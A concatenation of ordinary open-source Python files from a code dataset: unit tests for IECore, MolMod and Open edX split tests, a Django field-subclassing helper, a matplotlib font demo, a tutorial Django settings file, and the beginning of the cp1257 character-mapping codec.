# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import math
import unittest
from IECore import *
import random
import os
class BoolVectorDataTest( unittest.TestCase ) :
def test( self ) :
trueFalse = [ True, False ]
random.seed( 0 )
for i in range( 0, 100 ) :
s = random.randint( 0, 100 )
b = BoolVectorData( s )
self.assertEqual( s, len( b ) )
for j in range( 0, len( b ) ) :
self.assertEqual( b[j], False )
v = random.choice( trueFalse )
b[j] = v
self.assertEqual( b[j], v )
bb = b.copy()
self.assertEqual( b, bb )
ObjectWriter( b, "test/boolVector.cob" ).write()
bbb = ObjectReader( "test/boolVector.cob" ).read()
self.assertEqual( b, bbb )
def testStrAndRepr( self ) :
self.assertEqual( str( BoolVectorData( [True, False] ) ), "1 0" )
self.assertEqual( repr( BoolVectorData( [False, True] ) ), "IECore.BoolVectorData( [ 0, 1 ] )" )
def testHasBase( self ) :
self.failIf( BoolVectorData.hasBase() )
def tearDown( self ) :
if os.path.isfile( "test/boolVector.cob" ):
os.remove( "test/boolVector.cob" )
if __name__ == "__main__":
unittest.main()
| bsd-3-clause |
marinho/geraldo | site/newsite/django_1_0/django/db/models/fields/subclassing.py | 14 | 1819 | """
Convenience routines for creating non-trivial Field subclasses.
Add SubfieldBase as the __metaclass__ for your Field subclass, implement
to_python() and the other necessary methods and everything will work seamlessly.
"""
from django.utils.maxlength import LegacyMaxlength
class SubfieldBase(LegacyMaxlength):
"""
A metaclass for custom Field subclasses. This ensures the model's attribute
has the descriptor protocol attached to it.
"""
def __new__(cls, base, name, attrs):
new_class = super(SubfieldBase, cls).__new__(cls, base, name, attrs)
new_class.contribute_to_class = make_contrib(
attrs.get('contribute_to_class'))
return new_class
class Creator(object):
"""
A placeholder class that provides a way to set the attribute on the model.
"""
def __init__(self, field):
self.field = field
def __get__(self, obj, type=None):
if obj is None:
raise AttributeError('Can only be accessed via an instance.')
return obj.__dict__[self.field.name]
def __set__(self, obj, value):
obj.__dict__[self.field.name] = self.field.to_python(value)
def make_contrib(func=None):
"""
Returns a suitable contribute_to_class() method for the Field subclass.
If 'func' is passed in, it is the existing contribute_to_class() method on
the subclass and it is called before anything else. It is assumed in this
case that the existing contribute_to_class() calls all the necessary
superclass methods.
"""
def contribute_to_class(self, cls, name):
if func:
func(self, cls, name)
else:
super(self.__class__, self).contribute_to_class(cls, name)
setattr(cls, self.name, Creator(self))
return contribute_to_class
| lgpl-3.0 |
molmod/molmod | molmod/test/test_quaternions.py | 1 | 2233 | # -*- coding: utf-8 -*-
# MolMod is a collection of molecular modelling tools for python.
# Copyright (C) 2007 - 2019 Toon Verstraelen <Toon.Verstraelen@UGent.be>, Center
# for Molecular Modeling (CMM), Ghent University, Ghent, Belgium; all rights
# reserved unless otherwise stated.
#
# This file is part of MolMod.
#
# MolMod is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# MolMod is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
import unittest
import numpy as np
from molmod import *
__all__ = ["QuaternionTestCase"]
class QuaternionTestCase(unittest.TestCase):
def test_rotation_matrix(self):
q1 = np.random.normal(0,1,4)
q1 /= np.linalg.norm(q1)
r1 = quaternion_to_rotation_matrix(q1)
factor, q2 = rotation_matrix_to_quaternion(r1)
r2 = quaternion_to_rotation_matrix(q2)
assert (abs(q1-q2).max() < 1e-10) or (abs(q1+q2).max() < 1e-10)
assert abs(r1-r2).max() < 1e-10
def test_quaternion_rotation(self):
q = np.random.normal(0,1,4)
q /= np.linalg.norm(q)
r = quaternion_to_rotation_matrix(q)
p = np.random.normal(0,1,3)
pa = np.dot(r, p)
pb = quaternion_rotation(q, p)
assert abs(pa-pb).max() < 1e-10
def test_quaternion_product(self):
q1 = np.random.normal(0,1,4)
q1 /= np.linalg.norm(q1)
q2 = np.random.normal(0,1,4)
q2 /= np.linalg.norm(q2)
q3 = quaternion_product(q1, q2)
r1 = quaternion_to_rotation_matrix(q1)
r2 = quaternion_to_rotation_matrix(q2)
r3 = np.dot(r1, r2)
foo, q3_check = rotation_matrix_to_quaternion(r3)
assert (abs(q3-q3_check).max() < 1e-10) or (abs(q3+q3_check).max() < 1e-10)
| gpl-3.0 |
mjirayu/sit_academy | lms/djangoapps/courseware/tests/test_split_module.py | 83 | 10524 | """
Test for split test XModule
"""
from django.core.urlresolvers import reverse
from mock import MagicMock
from nose.plugins.attrib import attr
from courseware.module_render import get_module_for_descriptor
from courseware.model_data import FieldDataCache
from student.tests.factories import UserFactory, CourseEnrollmentFactory
from xmodule.modulestore.tests.factories import ItemFactory, CourseFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.partitions.partitions import Group, UserPartition
from openedx.core.djangoapps.user_api.tests.factories import UserCourseTagFactory
@attr('shard_1')
class SplitTestBase(ModuleStoreTestCase):
"""
Sets up a basic course and user for split test testing.
Also provides tests of rendered HTML for two user_tag conditions, 0 and 1.
"""
__test__ = False
COURSE_NUMBER = 'split-test-base'
ICON_CLASSES = None
TOOLTIPS = None
HIDDEN_CONTENT = None
VISIBLE_CONTENT = None
def setUp(self):
super(SplitTestBase, self).setUp()
self.partition = UserPartition(
0,
'first_partition',
'First Partition',
[
Group(0, 'alpha'),
Group(1, 'beta')
]
)
self.course = CourseFactory.create(
number=self.COURSE_NUMBER,
user_partitions=[self.partition]
)
self.chapter = ItemFactory.create(
parent_location=self.course.location,
category="chapter",
display_name="test chapter",
)
self.sequential = ItemFactory.create(
parent_location=self.chapter.location,
category="sequential",
display_name="Split Test Tests",
)
self.student = UserFactory.create()
CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)
self.client.login(username=self.student.username, password='test')
def _video(self, parent, group):
"""
Returns a video component with parent ``parent``
that is intended to be displayed to group ``group``.
"""
return ItemFactory.create(
parent_location=parent.location,
category="video",
display_name="Group {} Sees This Video".format(group),
)
def _problem(self, parent, group):
"""
Returns a problem component with parent ``parent``
that is intended to be displayed to group ``group``.
"""
return ItemFactory.create(
parent_location=parent.location,
category="problem",
display_name="Group {} Sees This Problem".format(group),
data="<h1>No Problem Defined Yet!</h1>",
)
def _html(self, parent, group):
"""
Returns an html component with parent ``parent``
that is intended to be displayed to group ``group``.
"""
return ItemFactory.create(
parent_location=parent.location,
category="html",
display_name="Group {} Sees This HTML".format(group),
data="Some HTML for group {}".format(group),
)
def test_split_test_0(self):
self._check_split_test(0)
def test_split_test_1(self):
self._check_split_test(1)
def _check_split_test(self, user_tag):
"""Checks that the right compentents are rendered for user with ``user_tag``"""
# This explicitly sets the user_tag for self.student to ``user_tag``
UserCourseTagFactory(
user=self.student,
course_id=self.course.id,
key='xblock.partition_service.partition_{0}'.format(self.partition.id),
value=str(user_tag)
)
resp = self.client.get(reverse(
'courseware_section',
kwargs={'course_id': self.course.id.to_deprecated_string(),
'chapter': self.chapter.url_name,
'section': self.sequential.url_name}
))
content = resp.content
# Assert we see the proper icon in the top display
self.assertIn('<a class="{} inactive progress-0"'.format(self.ICON_CLASSES[user_tag]), content)
# And proper tooltips
for tooltip in self.TOOLTIPS[user_tag]:
self.assertIn(tooltip, content)
for hidden in self.HIDDEN_CONTENT[user_tag]:
self.assertNotIn(hidden, content)
# Assert that we can see the data from the appropriate test condition
for visible in self.VISIBLE_CONTENT[user_tag]:
self.assertIn(visible, content)
class TestVertSplitTestVert(SplitTestBase):
"""
Tests related to xmodule/split_test_module
"""
__test__ = True
COURSE_NUMBER = 'vert-split-vert'
ICON_CLASSES = [
'seq_problem',
'seq_video',
]
TOOLTIPS = [
['Group 0 Sees This Video', "Group 0 Sees This Problem"],
['Group 1 Sees This Video', 'Group 1 Sees This HTML'],
]
HIDDEN_CONTENT = [
['Condition 0 vertical'],
['Condition 1 vertical'],
]
# Data is html encoded, because it's inactive inside the
# sequence until javascript is executed
VISIBLE_CONTENT = [
['class="problems-wrapper'],
['Some HTML for group 1']
]
def setUp(self):
# We define problem compenents that we need but don't explicitly call elsewhere.
# pylint: disable=unused-variable
super(TestVertSplitTestVert, self).setUp()
# vert <- split_test
# split_test cond 0 = vert <- {video, problem}
# split_test cond 1 = vert <- {video, html}
vert1 = ItemFactory.create(
parent_location=self.sequential.location,
category="vertical",
display_name="Split test vertical",
)
# pylint: disable=protected-access
c0_url = self.course.id.make_usage_key("vertical", "split_test_cond0")
c1_url = self.course.id.make_usage_key("vertical", "split_test_cond1")
split_test = ItemFactory.create(
parent_location=vert1.location,
category="split_test",
display_name="Split test",
user_partition_id='0',
group_id_to_child={"0": c0_url, "1": c1_url},
)
cond0vert = ItemFactory.create(
parent_location=split_test.location,
category="vertical",
display_name="Condition 0 vertical",
location=c0_url,
)
video0 = self._video(cond0vert, 0)
problem0 = self._problem(cond0vert, 0)
cond1vert = ItemFactory.create(
parent_location=split_test.location,
category="vertical",
display_name="Condition 1 vertical",
location=c1_url,
)
video1 = self._video(cond1vert, 1)
html1 = self._html(cond1vert, 1)
class TestSplitTestVert(SplitTestBase):
"""
Tests related to xmodule/split_test_module
"""
__test__ = True
COURSE_NUMBER = 'split-vert'
ICON_CLASSES = [
'seq_problem',
'seq_video',
]
TOOLTIPS = [
['Group 0 Sees This Video', "Group 0 Sees This Problem"],
['Group 1 Sees This Video', 'Group 1 Sees This HTML'],
]
HIDDEN_CONTENT = [
['Condition 0 vertical'],
['Condition 1 vertical'],
]
# Data is html encoded, because it's inactive inside the
# sequence until javascript is executed
VISIBLE_CONTENT = [
['class="problems-wrapper'],
['Some HTML for group 1']
]
def setUp(self):
# We define problem compenents that we need but don't explicitly call elsewhere.
# pylint: disable=unused-variable
super(TestSplitTestVert, self).setUp()
# split_test cond 0 = vert <- {video, problem}
# split_test cond 1 = vert <- {video, html}
# pylint: disable=protected-access
c0_url = self.course.id.make_usage_key("vertical", "split_test_cond0")
c1_url = self.course.id.make_usage_key("vertical", "split_test_cond1")
split_test = ItemFactory.create(
parent_location=self.sequential.location,
category="split_test",
display_name="Split test",
user_partition_id='0',
group_id_to_child={"0": c0_url, "1": c1_url},
)
cond0vert = ItemFactory.create(
parent_location=split_test.location,
category="vertical",
display_name="Condition 0 vertical",
location=c0_url,
)
video0 = self._video(cond0vert, 0)
problem0 = self._problem(cond0vert, 0)
cond1vert = ItemFactory.create(
parent_location=split_test.location,
category="vertical",
display_name="Condition 1 vertical",
location=c1_url,
)
video1 = self._video(cond1vert, 1)
html1 = self._html(cond1vert, 1)
@attr('shard_1')
class SplitTestPosition(ModuleStoreTestCase):
"""
Check that we can change positions in a course with partitions defined
"""
def setUp(self):
super(SplitTestPosition, self).setUp()
self.partition = UserPartition(
0,
'first_partition',
'First Partition',
[
Group(0, 'alpha'),
Group(1, 'beta')
]
)
self.course = CourseFactory.create(
user_partitions=[self.partition]
)
self.chapter = ItemFactory.create(
parent_location=self.course.location,
category="chapter",
display_name="test chapter",
)
self.student = UserFactory.create()
CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)
self.client.login(username=self.student.username, password='test')
def test_changing_position_works(self):
# Make a mock FieldDataCache for this course, so we can get the course module
mock_field_data_cache = FieldDataCache([self.course], self.course.id, self.student)
course = get_module_for_descriptor(
self.student,
MagicMock(name='request'),
self.course,
mock_field_data_cache,
self.course.id,
course=self.course
)
# Now that we have the course, change the position and save, nothing should explode!
course.position = 2
course.save()
| agpl-3.0 |
bundgus/python-playground | matplotlib-playground/examples/pylab_examples/fonts_demo_kw.py | 1 | 2105 | """
Same as fonts_demo using kwargs. If you prefer a more pythonic, OO
style of coding, see examples/fonts_demo.py.
"""
from matplotlib.font_manager import FontProperties
import matplotlib.pyplot as plt
import numpy as np
plt.subplot(111, axisbg='w')
alignment = {'horizontalalignment': 'center', 'verticalalignment': 'baseline'}
# Show family options
families = ['serif', 'sans-serif', 'cursive', 'fantasy', 'monospace']
t = plt.text(-0.8, 0.9, 'family', size='large', **alignment)
yp = [0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2]
for k, family in enumerate(families):
t = plt.text(-0.8, yp[k], family, family=family, **alignment)
# Show style options
styles = ['normal', 'italic', 'oblique']
t = plt.text(-0.4, 0.9, 'style', **alignment)
for k, style in enumerate(styles):
t = plt.text(-0.4, yp[k], style, family='sans-serif', style=style,
**alignment)
# Show variant options
variants = ['normal', 'small-caps']
t = plt.text(0.0, 0.9, 'variant', **alignment)
for k, variant in enumerate(variants):
t = plt.text(0.0, yp[k], variant, family='serif', variant=variant,
**alignment)
# Show weight options
weights = ['light', 'normal', 'medium', 'semibold', 'bold', 'heavy', 'black']
t = plt.text(0.4, 0.9, 'weight', **alignment)
for k, weight in enumerate(weights):
t = plt.text(0.4, yp[k], weight, weight=weight,
**alignment)
# Show size options
sizes = ['xx-small', 'x-small', 'small', 'medium', 'large',
'x-large', 'xx-large']
t = plt.text(0.8, 0.9, 'size', **alignment)
for k, size in enumerate(sizes):
t = plt.text(0.8, yp[k], size, size=size,
**alignment)
x = -0.4
# Show bold italic
t = plt.text(x, 0.1, 'bold italic', style='italic',
weight='bold', size='x-small',
**alignment)
t = plt.text(x, 0.2, 'bold italic',
style='italic', weight='bold', size='medium',
**alignment)
t = plt.text(x, 0.3, 'bold italic',
style='italic', weight='bold', size='x-large',
**alignment)
plt.axis([-1, 1, 0, 1])
plt.show()
| mit |
watson-developer-cloud/python-primer-companion-code | episode-4/django/src/projwatson/projwatson/settings.py | 6 | 4199 | # Copyright 2016 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Django settings for projwatson project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^igmjc3aaqr(+2j5=xi^wj07szp_3_qx!q1^c1w796zs3k019p'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'watsonlanguage',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'projwatson.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'projwatson.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'ourFormatter': {
'format': '%(asctime)s:%(name)s:%(levelname)s:%(message)s',
'datefmt': '%m/%d/%Y %I:%M:%S',
},
},
'handlers': {
'theConsole': {
'class': 'logging.StreamHandler',
'formatter': 'ourFormatter',
},
},
'root': {
'level': 'DEBUG',
'handlers': ['theConsole'],
},
}
| apache-2.0 |
4rado/RepositoryForProject | Lib/encodings/cp1257.py | 593 | 13630 | """ Python Character Mapping Codec cp1257 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1257.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp1257',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\u20ac' # 0x80 -> EURO SIGN
u'\ufffe' # 0x81 -> UNDEFINED
u'\u201a' # 0x82 -> SINGLE LOW-9 QUOTATION MARK
u'\ufffe' # 0x83 -> UNDEFINED
u'\u201e' # 0x84 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2026' # 0x85 -> HORIZONTAL ELLIPSIS
u'\u2020' # 0x86 -> DAGGER
u'\u2021' # 0x87 -> DOUBLE DAGGER
u'\ufffe' # 0x88 -> UNDEFINED
u'\u2030' # 0x89 -> PER MILLE SIGN
u'\ufffe' # 0x8A -> UNDEFINED
u'\u2039' # 0x8B -> SINGLE LEFT-POINTING ANGLE QUOTATION MARK
u'\ufffe' # 0x8C -> UNDEFINED
u'\xa8' # 0x8D -> DIAERESIS
u'\u02c7' # 0x8E -> CARON
u'\xb8' # 0x8F -> CEDILLA
u'\ufffe' # 0x90 -> UNDEFINED
u'\u2018' # 0x91 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0x92 -> RIGHT SINGLE QUOTATION MARK
u'\u201c' # 0x93 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0x94 -> RIGHT DOUBLE QUOTATION MARK
u'\u2022' # 0x95 -> BULLET
u'\u2013' # 0x96 -> EN DASH
u'\u2014' # 0x97 -> EM DASH
u'\ufffe' # 0x98 -> UNDEFINED
u'\u2122' # 0x99 -> TRADE MARK SIGN
u'\ufffe' # 0x9A -> UNDEFINED
u'\u203a' # 0x9B -> SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
u'\ufffe' # 0x9C -> UNDEFINED
u'\xaf' # 0x9D -> MACRON
u'\u02db' # 0x9E -> OGONEK
u'\ufffe' # 0x9F -> UNDEFINED
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\ufffe' # 0xA1 -> UNDEFINED
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa4' # 0xA4 -> CURRENCY SIGN
u'\ufffe' # 0xA5 -> UNDEFINED
u'\xa6' # 0xA6 -> BROKEN BAR
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xd8' # 0xA8 -> LATIN CAPITAL LETTER O WITH STROKE
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u0156' # 0xAA -> LATIN CAPITAL LETTER R WITH CEDILLA
u'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xac' # 0xAC -> NOT SIGN
u'\xad' # 0xAD -> SOFT HYPHEN
u'\xae' # 0xAE -> REGISTERED SIGN
u'\xc6' # 0xAF -> LATIN CAPITAL LETTER AE
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\xb2' # 0xB2 -> SUPERSCRIPT TWO
u'\xb3' # 0xB3 -> SUPERSCRIPT THREE
u'\xb4' # 0xB4 -> ACUTE ACCENT
u'\xb5' # 0xB5 -> MICRO SIGN
u'\xb6' # 0xB6 -> PILCROW SIGN
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xf8' # 0xB8 -> LATIN SMALL LETTER O WITH STROKE
u'\xb9' # 0xB9 -> SUPERSCRIPT ONE
u'\u0157' # 0xBA -> LATIN SMALL LETTER R WITH CEDILLA
u'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbc' # 0xBC -> VULGAR FRACTION ONE QUARTER
u'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
u'\xbe' # 0xBE -> VULGAR FRACTION THREE QUARTERS
u'\xe6' # 0xBF -> LATIN SMALL LETTER AE
u'\u0104' # 0xC0 -> LATIN CAPITAL LETTER A WITH OGONEK
u'\u012e' # 0xC1 -> LATIN CAPITAL LETTER I WITH OGONEK
u'\u0100' # 0xC2 -> LATIN CAPITAL LETTER A WITH MACRON
u'\u0106' # 0xC3 -> LATIN CAPITAL LETTER C WITH ACUTE
u'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\u0118' # 0xC6 -> LATIN CAPITAL LETTER E WITH OGONEK
u'\u0112' # 0xC7 -> LATIN CAPITAL LETTER E WITH MACRON
